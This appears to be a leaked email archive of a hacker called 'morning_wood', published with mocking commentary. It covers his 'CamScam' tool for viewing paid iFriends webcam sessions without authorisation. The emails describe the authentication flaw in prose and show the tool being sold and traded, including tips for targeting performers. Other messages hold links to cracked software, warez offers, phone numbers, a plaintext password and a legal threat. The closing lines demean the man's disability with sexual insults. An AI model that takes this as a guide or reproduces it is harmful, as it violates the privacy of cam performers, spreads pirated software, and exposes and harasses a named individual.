"outright". As my main coder for the "production" version, left a beta on his server and its now in the wild, I had done this one year ago and was terrified as what would happen if i let out the code. My intent was to present "CamScam" http://www.jungle2.org/Examples/FileLibrary/Files/index.html as not only proof of the vunerability, but to work with them to secure, and impliment our package with minimal impact to thier operations, and more importaintly their chat hosts privacy. As to the nature of the exploit, The way Ifriends works is a Java based authentication scheme. Being such it is simply a matter of looking at the way an authenticaed picture is able to reach the viewer. Basicly the Purchaser requests via his browser to Ifriends who in turn sends a string to the Purchasers browser, which in turn access the Chathosts cam software and the session is authorized. So ultimatly the goal is to reach the chathost via an authorized request. What is a authorized request? Ifcam96c & d have java classes and the html to access those classes inside the exe itself. Download ifcam96c http://download.com.com/3001-2348-10146565.html Simply load up the installed ifcam.exe in a binary editor and it is clear there are elements of Java, HTML and another ( vb??). I was able to produce working examples nearly just saving the .txt of the exe and subplanting the %s %d (ip port ) parameters with a test version of ifcam running on another computer via lan. Having no formal or other knowlege of html or java i simply tried things .. learning as i went. ...cut sceen, throught 2 weeks of of learning,hacking the final applet..

is all that is required of course this is a local example, of wich if you could spoof a local request remotly, there is no need for the acccode parameter at all. I will be collecting info and presenting the public disclosure items at http://ifriends.dontexist.org possibly a early version of camscam if you are interested in colloborating or consulting and need a person who has a unique perspective as to what can be tried, and tested and explored to the fullest There are a few other very bad vunerabiliies with Ifrienbds web based business setup. Ifrriends is not willing to negotiate with me either to find out more, or to hire me as a consultaint who has looked at things with a unique perspective and is now thought of as a "hacker". I estimate thierr losses since this disclosure, including recoding of the Ifcam software, changes in server side includes and loosing a signifigant share of thier source of income , thier Chathost fear and non trust. Not to mention down time for the teething problems of Ifcam96e, to total over $500,000 in the last 2 weeks. Conveyance in depth to this matter is beyond the typed message. As you can tell I just start to ramble. Serious inquires may reach me by phone at 360-312-8011 thank you morning_wood On Sun, 23 Mar 2003 05:30:13 -0800 Nick Jacobsen (nick@ethicsdesign.com) wrote: Ok, this just sounds too good to miss... would you mind sending me the full info? and a copy of the working exploit would be nice, just so I don;t have to code my own... Heh, Nick Ethics Design nick@ethicsdesign.com _______________________________________________________________ http://www.webmail.co.za the South-African free email service NetWiseGurus.Com Portal - Your Own Internet Business Today! From: Subject: Re: Re: potential buyer Date: Wed, 30 Apr 2003 15:00:23 -0700 To: Mourning Woode Full Headers Undecoded Letter -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 my offer was software for software. i dont do "jobs" for software. ur starting to sound like a fed to me, wood. send the name and maker of the software u want to me if u like. if not, then please reply telling me that the deal is dead. peace. Tjak ______________________________________________________________________ On Tue, 29 Apr 2003 22:26:56 -0700 Mourning Woode wrote: >ill trade a copy for a job.. show me your stuff if i like sumpin >mby >ill leave a thank you :) > >wood > >http://exploit.wox.org/ifriends/ > > >On Sun, 27 Apr 2003 13:41:22 -0700 (user11011@hush.com) wrote: > >> >>anything microshit i can provide, most other wares, i have alot >of >friends >>and almost unlimited supply of warez of all kinds (except for yours, >> >>of course, which i hope to soon add to my collection). Glad to hear >about >>illwill, damn newsgroups need to get more reliable sources i >guess..... >> >>are u a gamer? name a game, chances are i got it. want a new version >>of visual c++? 3d max pro for graphics design? need a new OS? just >ask. >>all i want is that program. hell, just gimmie the source code and >ill >>be happy. if only it was possible to pirate >hardware.........*sigh*..... >>Respond soon. >> >>Tjak >> >> >> >>____________________________________________________________________ >__ >>On Fri, 25 Apr 2003 11:30:13 -0700 Mourning Woode > >>wrote: >>>Will gladly consider offers, esp commercial security packages. >>>Outrageous? I dont know what price you saw? I will provide lists >>>as >>>well on an ongoing basis so there is some worth in going through >>>me. >>>As well the average price on ifriends is 5$ PER MINUTE, you >could >>>eat up 200-500$ in one day. P2P, as far as I know the camscam.exe >>>floating on p2p is either a full trojan or backdored from the >euyulio >>>crew ( they got jelous ). will is fine, and I have spoken to him >>>personaly on the phone in regards to your statement. >>> >>>morning_wood >>> >>>On Wed, 23 Apr 2003 20:45:05 -0700 (user11011@hush.com) wrote: >>> >>>> >>>>-----BEGIN PGP SIGNED MESSAGE----- >>>>Hash: SHA1 >>>> >>>>k pasa >>>> >>>>interested in your program. price seems a little outrageous though >>>interested >>>>in a trade? any software u want, i most likely have/can get very >>>soon. >>>>just trying to do the respectable thing here. i could just go >to >>>a >>>p2p >>>>and look ur app up; wanted to give something back. >>>> >>>>btw...... whatever became of illwill.....vauge story about >>>court >>>>or the like....anyway, consider my offer, respond soon. From: Richard.Johnson3@ey.com Subject: Re: Re: Ifriends vulnerability Date: Mon, 14 Apr 2003 14:56:08 -0500 To: "Mourning Woode" Full Headers Undecoded Letter Well unfortunately, even tho I try to center my professional work around security-type stuff the powers that be (those who cut my paycheck) dont find things like this very interesting, so the information is personally motivating. I'm also a big proponent of privacy and am trying to support efforts in security that maintain personal privacy over corporate interests. Thanks for your help. Rich "Mourning Woode" ub.co.za> cc: Subject: Re: Re: Ifriends vulnerability 04/12/2003 05:02 PM Rich, yes the powers that be (ifriends) dont seem to like my works, and complained to dyndns.org who hosted my names. Currently the collective info is at http://exploit.wox.org/ifriends/ I will consider releasing a .exe to you. I will coloborate if you would like but the main issue i wanted to stress is that WP/Ifriends directly violate thier own "Chathost Privacy Agreement". My question to you is are you interested in this on a personal.. or professional level? Currently I am unemployed and any considerations would be apriciated, heh. If you would like to discuss this in detail I am avalable via phone at 360-312-8011. There are many more issues with this company than "camscam". Donnie Werner "morning_wood" On Fri, 11 Apr 2003 11:52:56 -0500 (Richard.Johnson3@ey.com) wrote: >I just came across your reply as had been lost in my inbox and you have >that domain directed to a 10.x.x.x address. Is there another way i can get >this information? What other issues have you had? I'm fully capable of >reverse engineering any problems you've experienced. > >thanks, >Rich > > > > > "Mourning Woode" > > 3@ey.com> > ub.co.za> cc: > > Subject: Re: Ifriends vulner >ability > 03/26/2003 07:16 > > AM > > > > > > > > > >Rich, Thank you for your intrest. Public collection of info is at >http://mywood.kicks-ass.net/ifriends/ In depth discussion is welcomed >at 360-312-8011 There are very many more issues with this company than >is covered that i choose not to disclose. > >thank you, > >Donnie Werner > >http://take.candyfrom.us > > > >On Tue, 25 Mar 2003 13:42:48 -0600 (Richard.Johnson3@ey.com) wrote: > >>Hello, >> >>I was hoping I could get some additional details about the ifriends >>vulnerability. You mention a substitution of a filename for a >javaclass, >>and I'm unclear exactly what you mean. I would assume an attacker >could >>just scan for an open port signifying an ifriends service and use the >>modified code as a direct viewer? >> >>Thanks, >>Rich >> >> >> >>____________________________________________________________________ _ >___ >>The information contained in this message may be privileged and >confidential >> and protected from disclosure. If the reader of this message is not >the in >>tended recipient, or an employee or agent responsible for delivering >this me >>ssage to the intended recipient, you are hereby notified that any >disseminat >>ion, distribution or copying of this communication is strictly >prohibited. I >>f you have received this communication in error, please notify us >immediatel >>y by replying to the message and deleting it from your computer. >Thank you. >> Ernst & Young LLP >> > >_____________________________________________________________________ __ >Cool Connection, Cool Price, Internet Access for R59 monthly @ WebMail >http://www.webmail.co.za/dialup/ > > > > > >_____________________________________________________________________ ___ >The information contained in this message may be privileged and confidential > and protected from disclosure. If the reader of this message is not the in >tended recipient, or an employee or agent responsible for delivering this me >ssage to the intended recipient, you are hereby notified that any disseminat >ion, distribution or copying of this communication is strictly prohibited. I >f you have received this communication in error, please notify us immediatel >y by replying to the message and deleting it from your computer. Thank you. > Ernst & Young LLP From: "Mourning Woode" Subject: Re: Unlawful Exploitation of Rick Salomon/Paris Hilton Video Date: Thu, 19 Feb 2004 01:39:02 +0200 To: "Paul S. Berra" ,, , Cc: "Martin Singer" , "Paul S. Berra" Sirs, you are very missinformed as to MY involvment in this "video". I share a site with "illwill", it was his decision solely to post and the paypal link is under his name. Furthermore I have never recieved any gain from HIS involvement in this issue, nor am I aware of HIS dealings in regard to this issue. Please cease and disist any action against ME ( morningwood@thepub.co.za ) as I catagorically deny any involvement whatsoever in this "video" issue with your client. Personaly I have neither "viewed" nor "distributed" said "video" in any shape or form(at) whatsoever. If you do not wish to cease and disist and remove me from future involvement in your "action" I will be forced to take every step nessesary to procecute you for defamation of character and public slander by metioning me in conjunction with this issue. thank you, morningwood@thepub.co.za cc: legal@usatoday.com cc: legal@nytimes.com cc: legal@cnn.com On Wed, 18 Feb 2004 12:56:10 -0800 "Paul S. Berra" wrote: > > February 18, 2004 > > CONFIDENTIAL LEGAL COMMUNICATIONS > PROTECTED UNDER THE UNITED STATES COPYRIGHT ACT > NOT FOR PUBLICATION OR OTHER USE > > > VIA E-MAIL > xillwillx@yahoo.com > morningwood@thepub.co.za > atomix@illmob.org > > WWW.ILLMOB.ORG > Attn: illwill > morning wood > atomix > > Re: Salomon v. Hilton, et al./Copyright Violations > Our File No.: 3536-4 > > Dear Sirs/Madams: > > We are litigation counsel for Rick Salomon and his > website, www.trustfundgirls.com. As we have demanded of > other website operators and/or registrants, including > those persons and entities recently responsible for > www.sdr2.com, we hereby demand that you immediately cease > and desist from any further unauthorized exploitation of > the video (the "Video") involving Mr. Salomon and Paris > Hilton on the Internet and elsewhere. Specifically, it > has come to our attention that each of you have been and > are currently involved in the unlawful distribution and > commercial exploitation of the Video in a malicious > attempt to market and exploit your websites and the > products you purport to offer. > > Be advised that my clients are the exclusive owners of > the copyrights and other rights in the Video, and the > Video is being lawfully sold on, www.trustfundgirls.com, > the only website which is permitted to sell, publish, > broadcast, distribute or otherwise commercially exploit > (collectively, "exploit") the Video, and any portion > thereof. Therefore, if you do not immediately cease and > desist exploiting the Video in any and all media > whatsoever, including but not limited to stills of the > video, your individual exposures regarding liability and > damages in this case will continue to increase > exponentially, minute by minute, hour by hour. This > urgency applies with full force and effect to each and > every person and entity, including any other websites, > acting with you or on your behalf. Even if you purport > to give the Video away for free is irrelevant. As the > exclusive rights owners, my clients will suffer even more > harm - - which we estimate will run into the tens of > millions of dollars - - regardless of how much you charge > for the Video. Furthermore, you will be forced to > disgorge any revenues and profits earned therefrom and > will be subject to criminal prosecution. Anyone involved > in exploiting the Video will be responsible for > compensating my clients, in full, for the damages that > they suffer. > > It is no longer disputed that my clients own all > copyrights and other rights in the Video. The > unauthorized copying and distribution of the Video > clearly constitutes intentional and malicious > infringements of copyright in violation of the United > States Copyright Act, Title 17 of the United States Code, > Section 101, et. seq., and exposes you and everyone > acting in concert with you to civil liability, damages, > injunctive relief and reimbursement of all attorneys' > fees and costs incurred by my client(s) in connection > with a copyright infringement action. Infringement of > Mr. Salomon's copyrights will also expose you to criminal > prosecution, particularly if you continue to recklessly > choose to distribute the Video after being placed on > written notice that you have absolutely no rights to do > so. Section 504(b) of Title 17 of the United States Code > states: > > [T]he owner of copyright under this [Act] has the > exclusive rights to do and to authorize any of the > following: (1) to reproduce the copyrighted work . . . > (2) to prepare derivative works . . . (3) to distribute > copies . . . (4) to perform the copyrighted work publicly > . . . and (5) to display the copyrighted work publicly. > > (Emphasis added). Any action inconsistent with, or in > anyway violative of, Mr. Salomon's copyrights in the > Video constitute copyright infringement. See also, CMAX > / Cleveland v. UCR, Inc., 804 F. Supp. 337 (M.D. Ga. > 1992). The Copyright Act clearly defines such actions as > unauthorized publications and broadcasts which constitute > infringement, whether or not you are selling the > copyrighted work, merely trading, or supposedly giving > them away. Section 101 of Title 17 of the United States > Code sets forth the legal definitions of terms within the > Act: > > "Publication" is the distribution of copies ... of a > work to the public by sale or other transfer of > ownership, or by rental, lease, or lending . . . or other > distribution. > > Anyone "who violates any of the exclusive rights of the > copyright owner . . . is an infringer of the copyright." > 17 U.S.C. §§ 501(a). > > You and the other infringers will be held liable for any > and all actual damages sustained by my clients as a > result of your unlawful exploitation of the Video, and > you and the other infringers will be legally required and > ordered to disgorge and pay to my clients any and all > gross revenues and profits which you and the other > infringers receive now or in the future in connection > with the copying and distribution of the Video. 17 U.S.C. > §§§§ 504; see also, U.S. Payphone, Inc. v. Executives > Unlimited of Durham, Inc., 781 F. Supp. 412 (M.D.N.C. > 1991) (in addition to damages personally suffered, > profits gained by the infringement were disgorged > ensuring that the infringers did not retain any benefits > flowing from their wrongful conduct). > > If necessary, we will obtain through the litigation > process any and all business records evidencing your > improper conduct, and my clients will spare no expense to > track down every infringer connected to your unlawful > scheme. Section 504(b) of Title 17 of the United States > Code states: > > "The copyright owner is entitled to recover the > actual damages suffered by him or her as a result of the > infringement, and any profits of the infringer that are > attributable to the infringement and are not taken into > account in computing the actual damages. In establishing > the infringer's profits, the copyright owner is required > to present proof only of the infringer's gross revenue, > and the infringer is required to prove his or her > deductible expenses and the elements of profit > attributable to factors other than the copyrighted work." > (Emphasis added). > > You are further required to account to my clients for any > and all gross revenues and profits you may have received > from the offering and/or distribution of any of the > Video. Respect Inc. v. Committee on Status of Women, 821 > F. Supp. 531 (N.D. Ill. 1993). > > Moreover, my clients will, if necessary, obtain an order > restraining you from any further copying or distribution > of the Video. 17 U.S.C. §§ 502. In addition, you have > also exposed yourself to costs and attorneys' fees > incurred by my clients in connection with the legal > actions necessary to enforce and protect his copyrights > and other exclusive rights in the Video. 17 U.S.C. §§ > 505; Chi-Boy Music Club v. Charlie Club, Inc., 930 F.2d > 1224 (7th Cir. 1991) (attorneys' fees awarded against > intentional infringer); In Design v. K-Mart Apparel > Corp., 13 F.3d 559 (2nd Cir. 1992) (attorneys' fees > awarded to the prevailing party as incentive for > copyright owners to use courts to challenge and stop > infringement and to deter infringement). > > Finally, you have unlawfully misappropriated Mr. > Salomon's name and likeness for a commercial purpose, and > in so doing, have damaged his reputation. Your use of > Mr. Salomon's name to exploit the Video inevitably causes > confusion as to the source, sponsorship, affiliation and > endorsement of the products offered by your websites, all > in violation of Section 43(a) of the federal Lanham Act. > 15 U.S.C. § 1125(a) prohibits a person from using in > commerce any term or false designation of origin which > "is likely to cause confusion . . . as to the > affiliation, connection, or association of such person > with another person, or as to the origin, sponsorship, > or approval of his or her goods, services or commercial > activities by another person." > > In an attempt to ameliorate this harm, and hopefully > slow down the unlawful proliferation of the Video on the > Internet and elsewhere, we demand that you immediately > comply with the following: > > (1) e-mail to me a written acknowledgment that you have > ceased and permanently desisted from using, publishing, > distributing, selling, licensing or otherwise exploiting > the Video in any manner, including any other websites > that you are affiliated with; > > (2) inform every identifiable person and entity who > viewed, purchased, copied and/or downloaded a copy of the > Video from one of your websites of the following: > > (a) you never had valid rights to use, distribute, > publish or otherwise exploit the Video, and therefore > they never had valid rights to download or view any > portions of it, and they still do not have any such > rights; > > (b) Rick Salomon's attorneys have represented to you > that Mr. Salomon and his website, www.trustfundgirls.com, > are the exclusive owners of all copyrights and other > rights in the Video, and, as a result, you have removed > the Video from your websites; and > > (c) Those who copied or downloaded the Video must cease > and desist from any further distribution, publishing or > exploitation of the Video in any manner, or face > liability and damages based thereon, including the > imposition of punitive damages for knowingly violating > one's copyrighted material, and subjecting themselves to > criminal prosecution; > > (3) provide to me a detailed accounting of any and all > monies that you and any affiliated websites have received > from the use, publishing, distribution and any other > exploitation of the Video; > > (4) destroy all copies of the Video in any media, > whatsoever, including but not limited to any and all > videotape, film, compact discs, DVD's, computer floppy > discs, electronic mail, and provide to me a written > confirmation of same; and > > (5) provide to me a list of websites that you are > affiliated with, a list of names, e-mail addresses, and > other contact information of those persons and other > entities who copied or downloaded the Video from your > websites and/or have published, distributed or otherwise > exploited the Video. > > Should you fail to fully comply with these reasonable > demands, Mr. Salomon will have no alternative but to > assert his legal rights against you and those acting on > your behalf under both federal and state law and seek > compensatory damages, punitive damages, injunctive > relief, and the recovery of attorneys' fees necessitated > by your unlawful conduct. > > This is a confidential legal notice and may not be > published, in whole or in part. Any republishing or > dissemination of same, including but not limited to the > posting of the contents hereof on the Internet, shall > constitute a copyright infringement and will subject the > re-publisher(s) to civil liability for such actions. > This letter does not constitute a complete or exhaustive > statement of all of my client's rights, claims, > contentions or legal theories regarding this matter. > Nothing stated herein is intended as, nor should it be > deemed to constitute, a waiver or relinquishment of any > of my client's rights or remedies, whether legal or > equitable, all of which are hereby expressly reserved. > > Sincerely, > > / S / > > PAUL S. BERRA > > cc: Mr. Richard Salomon > Martin D. Singer, Esq. > 3536-2\Let\PSB-INFRINGERS 021804 > > > ---------------------------------------------------------------------- > PAUL S. BERRA > LAVELY & SINGER PROFESSIONAL CORPORATION > ATTORNEYS AT LAW > 2049 CENTURY PARK EAST, SUITE 24000 > LOS ANGELES, CALIFORNIA 90067-2906 > TELEPHONE: (310) 556-3501 > FACSIMILE: (310) 556-3615 > www.LavelySinger.com > E-MAIL: pberra@lavelysinger.com > ---------------------------------------------------------------------- > > THIS MESSAGE IS INTENDED ONLY FOR THE USE OF THE > INDIVIDUAL OR ENTITY TO WHICH IT IS ADDRESSED, AND MAY > CONTAIN INFORMATION THAT IS PRIVILEGED, CONFIDENTIAL AND > EXEMPT FROM DISCLOSURE UNDER APPLICABLE LAW AND MAY NOT > BE PUBLISHED OR DISSEMINATED IN WHOLE OR IN PART. IF THE > READER OF THIS MESSAGE IS NOT THE INTENDED RECIPIENT, OR > THE EMPLOYEE OR AGENT RESPONSIBLE FOR DELIVERING THE > MESSAGE TO THE INTENDED RECIPIENT, YOU ARE HEREBY > NOTIFIED THAT ANY DISCLOSURE, COPYING, DISTRIBUTION OR > THE TAKING OF ANY ACTION IN RELIANCE ON THE CONTENTS OF > THIS COMMUNICATION IS STRICTLY PROHIBITED. > > IF YOU HAVE RECEIVED THIS COMMUNICATION IN ERROR, PLEASE > NOTIFY THE LAW OFFICES OF LAVELY & SINGER PROFESSIONAL > CORPORATION IMMEDIATELY BY TELEPHONE (310-556-3501) OR > E-MAIL (REPLY TO SENDER'S ADDRESS), AND THEN DESTROY ALL > COPIES OF THIS COMMUNICATION AND ANY ATTACHED FILES. > THANK YOU. From: Subject: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: camscam Date: Tue, 10 Jun 2003 02:54:13 +0300 To: "Mourning Woode" Full Headers Undecoded Letter i have found perl2exe 5.03 fullversion.. you can get it from http://www.shadowman.ro/p2x-5.03-Win32.zip and the crack from http://www.shadowman.ro/crack.zip i registered that version with that crack..the command is perl2exe -gui C:\perl>perl2exe Perl2Exe V5.03b Copyright (c) 1997-2002 IndigoSTAR Software Warning: platform = Win32, perl.exe not found in path Warning: perl.exe not found in path Registered to Dan:Dan:20055002, ENT version Usage: perl2exe myscript.pl options: -perloptions="options" Set Perl options (Default = none) -small Generate smaller exe file (Pro version only) -tiny Generate even smaller exe file (Pro version only) -gui Generate a no-console executable (Pro version only) -platform=Win32 Generate code for Win32 (default) i used the CS beta2 and it have some errors to resolf some screen-name...still good until now..:)) tell me if the perl2exe worked ----- Original Message ----- From: "Mourning Woode" To: Sent: Saturday, 10 May, 2003 05:36 Subject: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: camscam > saves in bmp only i think, save favorites i think is button on lower > right, verify file is written, i save copy after i close and rename so > i get new favs.txt every time. There are new versions in development. > I will give you beta2 it is different ( i personaly use beta2 ). > > perl2exe any or all versions, i just need to be real full versions, so > i can make special programs with no limits / warnings. > > On Mon, 9 Jun 2003 01:04:48 +0300 (darkangel@go.ro) wrote: > > >which version of perl2exe? for windows or Linux? the latest perl2exe > is v 7 > >and supports Perl 5.8.0, Perl 5.6.1, Perl 5.6.0 and Perl 5.005 . If > that is > >ok...just tell me and I upload on a site..u have right..the beta 3 > camscam > >works on 20%-25% screen names. but it cannot save as jpg..the save > button is > >open button and it not save it. the favorites save as Username not > screen > >name and it can't be delete /modify. If I close the camscam the > favorites > >are deleted too...sometimes in name resolv when I paste the screen > name > >appear "error" not the ip and the port...until now :)btw..May I help > u to > >test or something ? > > > >----- Original Message ----- > >From: "Mourning Woode" > >To: > >Sent: Friday, 09 May, 2003 21:08 > >Subject: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: camscam > > > > > >> certainly it is not a 8080 issue. The fuzzy and grey is from girls > >> using 96e. I maintain a list of older 96d version usersthat are > still > >> clear. My suggestion is do collect many screen names and try every > >> one, making favorites as you go for clear ones. I cureently have 2 > >> people working on new 96e compatable versions... DONATIONS ARE > >> ACCECPTED :) btw.. I am looking for full version of PERL2EXE or > >> similar... > >> > >> > >> On Fri, 9 May 2003 09:54:51 +0300 (darkangel@go.ro) wrote: > >> > >> >i downloaded it...but when i try to connect to any person which > have > >> the > >> >port 8080 appears connecting... and then disapear and don't > work..but > >> if the > >> >victim has port 8081 it work but the quality is not good...i've > >> attached a > >> >copy of connection to 8080 which i am not receiving the image and > >> oane of > >> >port 8081 when i have image but the quality is poor...anyway > >> thanks..do you > >> >think that is a bug with the port 8080 or just because at job i am > >> unning > >> >win98se? > >> >dan From: webmistress@ladieslinks.com Subject: Account Approved Date: Thu, 26 Dec 2002 09:32:30 -0800 (PST) To: morningwood@thepub.co.za Full Headers Undecoded Letter Your account has been approved for our top sites list. You can begin sending hits to the list at any time. Use the following URL for your links: http://www.ladieslinks.com/in.php?id=mrwood If you need to make changes to your account, or want to see your statistics, use the following login info: Login At: http://join.ladieslinks.com/accounts.php?login Username: mrwood Password: qazwsx Make sure you write down your username and password! If you have any questions contact webmistress@ladieslinks.com Regards, Donna & Cecil PS: Another link that might interest you.. The Woman's TGP: http://www.womenstgp.com -~-~-~ The rest iz too lame to show here. It is truely discusting how many complete e-tardz email morning_wood and get his elitist responcez. Those of you who've seen morning_wood at his numerious african con attendencez and saw that morning_wood only has 1 hand to type with will really laugh at his password in that last email. He likes to pick passwords from one side of the keyboard, so he can easily type it one handed, while using a foot to masterbate over a